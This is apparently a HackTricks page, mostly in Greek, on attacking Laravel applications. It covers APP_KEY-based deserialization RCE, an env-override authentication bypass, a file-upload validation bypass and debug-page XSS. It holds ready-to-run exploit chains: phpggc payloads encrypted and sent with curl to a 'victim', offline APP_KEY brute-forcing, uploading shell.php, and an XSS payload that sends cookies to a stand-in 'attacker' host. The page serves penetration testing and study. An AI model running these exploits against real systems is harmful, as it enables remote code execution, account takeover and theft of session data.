Laravel

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Laravel SQLInjection

Διαβάστε πληροφορίες σχετικά με αυτό εδώ: https://stitcher.io/blog/unsafe-sql-functions-in-laravel

APP_KEY & Εσωτερικά Κρυπτογράφησης (Laravel >=5.6)

Το Laravel χρησιμοποιεί AES-256-CBC (ή GCM) με HMAC για ακεραιότητα στο παρασκήνιο (Illuminate\Encryption\Encrypter). Το ακατέργαστο κρυπτοκείμενο που τελικά αποστέλλεται στον πελάτη είναι Base64 ενός JSON αντικειμένου όπως:

{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}

encrypt($value, $serialize=true) θα κάνει serialize() το plaintext από προεπιλογή, ενώ decrypt($payload, $unserialize=true) θα κάνει αυτόματα unserialize() την αποκρυπτογραφημένη τιμή. Επομένως any attacker that knows the 32-byte secret APP_KEY can craft an encrypted PHP serialized object and gain RCE via magic methods (__wakeup, __destruct, …).

Minimal PoC (framework ≥9.x):

use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste

Εισάγετε την παραγόμενη συμβολοσειρά σε οποιοδήποτε ευάλωτο decrypt() sink (route param, cookie, session, …).

laravel-crypto-killer 🧨

laravel-crypto-killer αυτοματοποιεί ολόκληρη τη διαδικασία και προσθέτει μια βολική bruteforce λειτουργία:

# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt

Το script υποστηρίζει διαφανώς τόσο CBC όσο και GCM payloads και επαναδημιουργεί το πεδίο HMAC/tag.

Πραγματικά ευάλωτα μοτίβα

Η ροή εκμετάλλευσης είναι πάντα:

1. Αποκτήστε ή brute-force το 32-byte APP_KEY.
2. Κατασκευάστε ένα gadget chain με PHPGGC (π.χ. Laravel/RCE13, Laravel/RCE9 ή Laravel/RCE15).
3. Κρυπτογραφήστε το serialized gadget με laravel_crypto_killer.py και το ανακτηθέν APP_KEY.
4. Παραδώστε το ciphertext στον ευάλωτο decrypt() sink (route parameter, cookie, session …) για να προκαλέσετε RCE.

Παρακάτω βρίσκονται συνοπτικά one-liners που δείχνουν την πλήρη πορεία επίθεσης για κάθε πραγματικό CVE που αναφέρθηκε παραπάνω:

# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

Μαζική ανακάλυψη APP_KEY μέσω cookie brute-force

Επειδή κάθε νέα απάντηση του Laravel ορίζει τουλάχιστον 1 κρυπτογραφημένο cookie (XSRF-TOKEN and usually laravel_session), public internet scanners (Shodan, Censys, …) leak millions of ciphertexts που μπορούν να επιτεθούν offline.

Key findings of the research published by Synacktiv (2024-2025):

• Dataset July 2024 » 580 k tokens, 3.99 % keys cracked (≈23 k)
• Dataset May 2025 » 625 k tokens, 3.56 % keys cracked

• 1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.

• Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).

The private Go tool nounours pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.

CVE-2024-52301 – HTTP argv/env override → auth bypass

When PHP’s register_argc_argv=On (typical on many distros), PHP exposes an argv array for HTTP requests derived from the query string. Recent Laravel versions parsed these “CLI-like” args and honored --env=<value> at runtime. This allows flipping the framework environment for the current HTTP request just by appending it to any URL:

• Quick check:

• Visit https://target/?--env=local or any string and look for environment-dependent changes (debug banners, footers, verbose errors). If the string is reflected, the override is working.

• Impact example (business logic trusting a special env):

• If the app contains branches like if (app()->environment('preprod')) { /* bypass auth */ }, you can authenticate without valid creds by sending the login POST to:

• POST /login?--env=preprod

• Notes:

• Works per-request, no persistence.

• Requires register_argc_argv=On and a vulnerable Laravel version that reads argv for HTTP.

• Useful primitive to surface more verbose errors in “debug” envs or to trigger environment-gated code paths.

• Mitigations:

• Disable register_argc_argv for PHP-FPM/Apache.

• Upgrade Laravel to ignore argv on HTTP requests and remove any trust assumptions tied to app()->environment() in production routes.

Minimal exploitation flow (Burp):

POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf

CVE-2025-27515 – Παράκαμψη επαλήθευσης αρχείων με wildcard (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 και 12.0.0–12.1.0 επιτρέπουν σε κακόβουλα crafted multipart requests να παρακάμψουν εντελώς οποιονδήποτε κανόνα που είναι δεμένος σε files.* / images.*. Ο parser που επεκτείνει τα wildcard keys μπορεί να μπερδευτεί από attacker-controlled placeholders (π.χ. προ-γεμίζοντας segments __asterisk__), έτσι το framework θα δημιουργεί αντικείμενα UploadedFile χωρίς ποτέ να εκτελέσει τους κανόνες image, mimes, dimensions, max, κ.ά. Μόλις ένα κακόβουλο blob προσγειωθεί σε Storage::putFile* μπορείτε να pivot σε οποιοδήποτε από τα file-upload primitives που έχουν ήδη αναφερθεί στο HackTricks (web shells, log poisoning, signed job deserialization, …).

Hunting for the pattern

• Στατικό: rg -n "files\\.\*" -g"*.php" app/ ή επιθεωρήστε τις FormRequest κλάσεις για rules() που επιστρέφουν arrays που περιέχουν files.*.
• Δυναμικό: hook Illuminate\Validation\Validator::validate() μέσω Xdebug ή Laravel Telescope σε περιβάλλον pre-production για να καταγράψετε κάθε request που χτυπά τον ευάλωτο κανόνα.
• Έλεγχος middleware/route: endpoints που δέχονται πολλά αρχεία (avatar importers, document portals, drag-n-drop components) τείνουν να εμπιστεύονται τα files.*.

Practical exploitation workflow

1. Capture a legitimate upload and replay it in Burp Repeater.
2. Duplicate the same part but alter the field name so it already includes placeholder tokens (e.g., files[0][__asterisk__payload]) or nest another array (files[0][alt][0]). Σε ευάλωτες builds, εκείνο το δεύτερο μέρος δεν επαληθεύεται ποτέ αλλά εξακολουθεί να γίνεται εγγραφή ως UploadedFile.
3. Point the forged file to a PHP payload (shell.php, .phar, polyglot) και αναγκάστε την εφαρμογή να το αποθηκεύσει σε web-accessible disk (συνήθως public/ μόλις ενεργοποιηθεί php artisan storage:link).

curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'

Συνεχίστε να κάνετε fuzzing στα ονόματα κλειδιών (files.__dot__0, files[0][0], files[0][uuid] …) μέχρι να βρείτε ένα που παρακάμπτει τον validator αλλά εξακολουθεί να γράφεται στον δίσκο· οι διορθωμένες εκδόσεις απορρίπτουν αμέσως αυτά τα κατασκευασμένα ονόματα ιδιοτήτων.

Ευπάθειες πακέτων οικοσυστήματος που αξίζει να συνδυαστούν (2025)

CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (affects auth0/laravel-auth0)

Αν το έργο χρησιμοποιεί Auth0 login με το default CookieStore backend και auth0/auth0-php < 8.14.0, το GCM tag στο auth0 session cookie είναι αρκετά μικρό για brute-force εκτός σύνδεσης. Καταγράψτε ένα cookie, τροποποιήστε το JSON payload (π.χ. θέστε "sub":"auth0|admin" και app_metadata.roles), κάντε brute-force στο tag και αναπαραγάγετέ το για να αποκτήσετε έγκυρη Laravel guard session. Γρήγοροι έλεγχοι: το composer.lock δείχνει auth0/auth0-php <8.14.0 και το .env έχει AUTH0_SESSION_STORAGE=cookie.

CVE-2025-48490 – lomkit/laravel-rest-api validation override

Το πακέτο lomkit/laravel-rest-api πριν την 2.13.0 συγχωνεύει τα per-action rules λανθασμένα: οι μεταγενέστεροι ορισμοί υπερισχύουν των προηγούμενων για το ίδιο attribute, επιτρέποντας σε crafted πεδία να παρακάμψουν την επικύρωση (π.χ. να αντικαταστήσουν τους κανόνες filter κατά τη δράση update), οδηγώντας σε mass assignment ή μη επικυρωμένα SQL-ish φίλτρα. Πρακτικοί έλεγχοι:

• Το composer.lock περιέχει lomkit/laravel-rest-api <2.13.0.
• Το /_rest/users?filters[0][column]=password&filters[0][operator]== γίνεται αποδεκτό αντί για απορριπτέο, δείχνοντας ότι η επικύρωση των φίλτρων παρακάμφθηκε.

Κόλπα Laravel

Λειτουργία debugging

Αν το Laravel είναι σε debugging mode, θα μπορείτε να έχετε πρόσβαση στον κώδικα και σε ευαίσθητα δεδομένα.
Για παράδειγμα http://127.0.0.1:8000/profiles:

Αυτό συνήθως απαιτείται για την εκμετάλλευση άλλων Laravel RCE CVEs.

CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

• Επηρεαζόμενα: Laravel 11.9.0–11.35.1 με APP_DEBUG=true (είτε παγκοσμίως είτε αναγκαστικά μέσω λάθος ρυθμισμένων env overrides όπως CVE-2024-52301).
• Περιγραφή: κάθε μη χειρισμένη εξαίρεση που αποδίδεται από Whoops αντικατοπτρίζει τμήματα του request/route χωρίς HTML encoding, οπότε η εισαγωγή <img src> / <script> σε μια route ή παράμετρο request οδηγεί σε XSS αποθηκευμένο στην απάντηση πριν την αυθεντικοποίηση.
• Επίπτωση: κλοπή του XSRF-TOKEN, leak stack traces με μυστικά, δυνατότητα browser-based pivot για να χτυπηθεί το _ignition/execute-solution σε συνεδρίες θυμάτων, ή chaining με passwordless dashboards που βασίζονται σε cookies.

Ελάχιστο PoC:

// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});

curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"

Ακόμα κι αν το debug mode είναι συνήθως απενεργοποιημένο, η πρόκληση ενός σφάλματος μέσω background jobs ή queue workers και η διερεύνηση του _ignition/health-check endpoint συχνά αποκαλύπτει staging hosts που εξακολουθούν να εκθέτουν αυτή την αλυσίδα.

Fingerprinting & εκτεθειμένα dev endpoints

Γρήγοροι έλεγχοι για τον εντοπισμό ενός Laravel stack και επικίνδυνου dev tooling που είναι εκτεθειμένο σε production:

• /_ignition/health-check → Ignition present (debug tool used by CVE-2021-3129). If reachable unauthenticated, the app may be in debug or misconfigured.
• /_debugbar → Laravel Debugbar assets; often indicates debug mode.
• /telescope → Laravel Telescope (dev monitor). If public, expect broad information disclosure and possible actions.
• /horizon → Queue dashboard; version disclosure and sometimes CSRF-protected actions.
• X-Powered-By, cookies XSRF-TOKEN and laravel_session, and Blade error pages also help fingerprint.

# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done

.env

Το Laravel αποθηκεύει το APP που χρησιμοποιεί για να encrypt τα cookies και άλλα credentials σε ένα αρχείο που ονομάζεται .env, το οποίο μπορεί να προσεγγιστεί μέσω path traversal στο: /../.env

Το Laravel θα εμφανίσει επίσης αυτές τις πληροφορίες στη σελίδα debug (που εμφανίζεται όταν το Laravel εντοπίσει ένα σφάλμα και είναι ενεργοποιημένο).

Χρησιμοποιώντας το μυστικό APP_KEY του Laravel μπορείτε να decrypt και να re-encrypt τα cookies:

Decrypt Cookie

</details>

### Laravel Deserialization RCE

Ευάλωτες εκδόσεις: 5.5.40 και 5.6.x έως 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Εδώ θα βρείτε πληροφορίες για την deserialization ευπάθεια: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

Μπορείτε να τη δοκιμάσετε και να την εκμεταλλευτείτε χρησιμοποιώντας [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Ή μπορείτε επίσης να την εκμεταλλευτείτε με metasploit: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

Άλλη deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## Αναφορές
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)


> [!TIP]
> Μάθετε & εξασκηθείτε στο AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Μάθετε & εξασκηθείτε στο GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Μάθετε & εξασκηθείτε στο Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Υποστηρίξτε το HackTricks</summary>
>
> - Ελέγξτε τα [**σχέδια συνδρομής**](https://github.com/sponsors/carlospolop)!
> - **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>